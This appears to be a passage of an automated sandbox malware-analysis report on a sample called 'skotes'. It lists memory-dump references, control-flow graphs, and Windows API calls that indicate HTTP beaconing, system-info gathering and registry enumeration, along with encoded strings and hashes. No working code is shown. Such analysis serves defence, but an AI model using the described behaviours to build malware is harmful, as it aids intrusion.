                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                                                                                                                • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                                                • API String ID: 1875963930-2267310118
                                                                                                                                                                                                                                                                • Opcode ID: ebc88823ff6086cd67f579272b48c159793388ff6a6ab1dab7e057c835fc76f5
                                                                                                                                                                                                                                                                • Instruction ID: f6307828c279c15cccd82102fa939fa4b98d3dbd98889c602df524b25fb73185
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebc88823ff6086cd67f579272b48c159793388ff6a6ab1dab7e057c835fc76f5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF24A71A101449FEB1CDB78CE89BDDBB76AF82304F108298E449A73D7DB359A84CB51

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1230 aabe30-aabe7c 1231 aabe82-aabe86 1230->1231 1232 aac281-aac2a6 call ab80c0 1230->1232 1231->1232 1234 aabe8c-aabe90 1231->1234 1237 aac2a8-aac2b4 1232->1237 1238 aac2d4-aac2ec 1232->1238 1234->1232 1236 aabe96-aabf2a Sleep InternetOpenW InternetConnectA call ab7a00 call aa5c10 1234->1236 1261 aabf2e-aabf4a HttpOpenRequestA 1236->1261 1262 aabf2c 1236->1262 1240 aac2ca-aac2d1 call abd663 1237->1240 1241 aac2b6-aac2c4 1237->1241 1242 aac238-aac250 1238->1242 1243 aac2f2-aac2fe 1238->1243 1240->1238 1241->1240 1245 aac34f-aac354 call ad6c6a 1241->1245 1249 aac323-aac33f call abcff1 1242->1249 1250 aac256-aac262 1242->1250 1247 aac22e-aac235 call abd663 1243->1247 1248 aac304-aac312 1243->1248 1247->1242 1248->1245 1257 aac314 1248->1257 1258 aac268-aac276 1250->1258 1259 aac319-aac320 call abd663 1250->1259 1257->1247 1258->1245 1260 aac27c 1258->1260 1259->1249 1260->1259 1267 aabf7b-aabfea call ab7a00 call aa5c10 call ab7a00 call aa5c10 1261->1267 1268 aabf4c-aabf5b 1261->1268 1262->1261 1282 aabfee-aac004 HttpSendRequestA 1267->1282 1283 aabfec 1267->1283 1270 aabf5d-aabf6b 1268->1270 1271 aabf71-aabf78 call abd663 1268->1271 1270->1271 1271->1267 1284 aac006-aac015 1282->1284 1285 aac035-aac05d 1282->1285 1283->1282 1286 aac02b-aac032 call abd663 1284->1286 1287 aac017-aac025 1284->1287 1288 aac08e-aac0af InternetReadFile 1285->1288 1289 aac05f-aac06e 1285->1289 1286->1285 1287->1286 1293 aac0b5 1288->1293 1291 aac070-aac07e 1289->1291 1292 aac084-aac08b call abd663 1289->1292 1291->1292 1292->1288 1294 aac0c0-aac170 call ad4250 1293->1294
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000005DC,61AD01A7,?,00000000), ref: 00AABEB8
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(00AF8DC8,00000000,00000000,00000000,00000000), ref: 00AABEC8
                                                                                                                                                                                                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00AABEEB
                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,00000000), ref: 00AABF35
                                                                                                                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000), ref: 00AABFF6
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000003FF,?), ref: 00AAC0A7
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00AAC187
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00AAC18F
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00AAC197
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                                                                                                                                                • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                                                • API String ID: 2167506142-885246636
                                                                                                                                                                                                                                                                • Opcode ID: ffd2e875e533ee84bfd6c86275efd094aa530ec2cba9dff00dd3b6497fb456a8
                                                                                                                                                                                                                                                                • Instruction ID: 12b5bb3200a49ad4ffe62e760aad033fd072eabe3662608d250c738a7ea09cb5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffd2e875e533ee84bfd6c86275efd094aa530ec2cba9dff00dd3b6497fb456a8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BB1F4B1A101189BEF28DF28CD84BEDBB79EF42314F5041A9F509972D2DB719AC4CB94

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1676 aa7d30-aa7db2 call ad40f0 1680 aa7db8-aa7de0 call ab7a00 call aa5c10 1676->1680 1681 aa8356-aa8373 call abcff1 1676->1681 1688 aa7de2 1680->1688 1689 aa7de4-aa7e06 call ab7a00 call aa5c10 1680->1689 1688->1689 1694 aa7e0a-aa7e23 1689->1694 1695 aa7e08 1689->1695 1698 aa7e54-aa7e7f 1694->1698 1699 aa7e25-aa7e34 1694->1699 1695->1694 1702 aa7eb0-aa7ed1 1698->1702 1703 aa7e81-aa7e90 1698->1703 1700 aa7e4a-aa7e51 call abd663 1699->1700 1701 aa7e36-aa7e44 1699->1701 1700->1698 1701->1700 1704 aa8374 call ad6c6a 1701->1704 1708 aa7ed3-aa7ed5 GetNativeSystemInfo 1702->1708 1709 aa7ed7-aa7edc 1702->1709 1706 aa7e92-aa7ea0 1703->1706 1707 aa7ea6-aa7ead call abd663 1703->1707 1716 aa8379-aa837f call ad6c6a 1704->1716 1706->1704 1706->1707 1707->1702 1713 aa7edd-aa7ee6 1708->1713 1709->1713 1714 aa7ee8-aa7eef 1713->1714 1715 aa7f04-aa7f07 1713->1715 1719 aa8351 1714->1719 1720 aa7ef5-aa7eff 1714->1720 1721 aa7f0d-aa7f16 1715->1721 1722 aa82f7-aa82fa 1715->1722 1719->1681 1724 aa834c 1720->1724 1725 aa7f18-aa7f24 1721->1725 1726 aa7f29-aa7f2c 1721->1726 1722->1719 1727 aa82fc-aa8305 1722->1727 1724->1719 1725->1724 1729 aa7f32-aa7f39 1726->1729 1730 aa82d4-aa82d6 1726->1730 1731 aa832c-aa832f 1727->1731 1732 aa8307-aa830b 1727->1732 1735 aa8019-aa82bd call ab7a00 call aa5c10 call ab7a00 call aa5c10 call aa5d50 call ab7a00 call aa5c10 call aa5730 call ab7a00 call aa5c10 call ab7a00 call aa5c10 call aa5d50 call ab7a00 call aa5c10 call aa5730 call ab7a00 call aa5c10 call ab7a00 call aa5c10 call aa5d50 call ab7a00 call aa5c10 call aa5730 call ab7a00 call aa5c10 call ab7a00 call aa5c10 call aa5d50 call ab7a00 call aa5c10 call aa5730 1729->1735 1736 aa7f3f-aa7f9b call ab7a00 call aa5c10 call ab7a00 call aa5c10 call aa5d50 1729->1736 1733 aa82d8-aa82e2 1730->1733 1734 aa82e4-aa82e7 1730->1734 1739 aa833d-aa8349 1731->1739 1740 aa8331-aa833b 1731->1740 1737 aa830d-aa8312 1732->1737 1738 aa8320-aa832a 1732->1738 1733->1724 1734->1719 1741 aa82e9-aa82f5 1734->1741 1776 aa82c3-aa82cc 1735->1776 1761 aa7fa0-aa7fa7 1736->1761 1737->1738 1743 aa8314-aa831e 1737->1743 1738->1719 1739->1724 1740->1719 1741->1724 1743->1719 1763 aa7fab-aa7fcb call ad8bbe 1761->1763 1764 aa7fa9 1761->1764 1770 aa7fcd-aa7fdc 1763->1770 1771 aa8002-aa8004 1763->1771 1764->1763 1773 aa7fde-aa7fec 1770->1773 1774 aa7ff2-aa7fff call abd663 1770->1774 1775 aa800a-aa8014 1771->1775 1771->1776 1773->1716 1773->1774 1774->1771 1775->1776 1776->1722 1778 aa82ce 1776->1778 1778->1730
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AA7ED3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                                • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$hf$pNh
                                                                                                                                                                                                                                                                • API String ID: 1721193555-1973232016
                                                                                                                                                                                                                                                                • Opcode ID: cedd7c04c303725de037a821ba3a30893bb861f3f7067f2794623d3774bfe2ac
                                                                                                                                                                                                                                                                • Instruction ID: fe6b13027362568be8b69a6f0c4ab21e822592cbdda9e509deb94aa5fc68fc38
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cedd7c04c303725de037a821ba3a30893bb861f3f7067f2794623d3774bfe2ac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CE1E670E00644ABDB24BB38CD5B3AE7B71AB42720F94429CE4156B3D2DF754E858BD2

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1830 aa6020-aa619d call abe150 call ab80c0 * 5 RegOpenKeyExA 1843 aa61a3-aa6233 call ad40f0 1830->1843 1844 aa64b1-aa64ba 1830->1844 1873 aa6239-aa623d 1843->1873 1874 aa649f-aa64ab 1843->1874 1845 aa64bc-aa64c7 1844->1845 1846 aa64e7-aa64f0 1844->1846 1848 aa64c9-aa64d7 1845->1848 1849 aa64dd-aa64e4 call abd663 1845->1849 1850 aa651d-aa6526 1846->1850 1851 aa64f2-aa64fd 1846->1851 1848->1849 1853 aa65d7-aa65df call ad6c6a 1848->1853 1849->1846 1857 aa6528-aa6533 1850->1857 1858 aa6553-aa655c 1850->1858 1855 aa64ff-aa650d 1851->1855 1856 aa6513-aa651a call abd663 1851->1856 1855->1853 1855->1856 1856->1850 1865 aa6549-aa6550 call abd663 1857->1865 1866 aa6535-aa6543 1857->1866 1860 aa655e-aa6569 1858->1860 1861 aa6585-aa658e 1858->1861 1868 aa657b-aa6582 call abd663 1860->1868 1869 aa656b-aa6579 1860->1869 1870 aa65bb-aa65d6 call abcff1 1861->1870 1871 aa6590-aa659f 1861->1871 1865->1858 1866->1853 1866->1865 1868->1861 1869->1853 1869->1868 1878 aa65b1-aa65b8 call abd663 1871->1878 1879 aa65a1-aa65af 1871->1879 1881 aa6499 1873->1881 1882 aa6243-aa6279 RegEnumValueA 1873->1882 1874->1844 1878->1870 1879->1853 1879->1878 1881->1874 1887 aa627f-aa629e 1882->1887 1888 aa6486-aa648d 1882->1888 1889 aa62a0-aa62a5 1887->1889 1888->1882 1890 aa6493 1888->1890 1889->1889 1892 aa62a7-aa62fb call ab80c0 call ab7a00 * 2 call aa5d50 1889->1892 1890->1881 1892->1888
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00AA617D
                                                                                                                                                                                                                                                                • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00AA6271
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
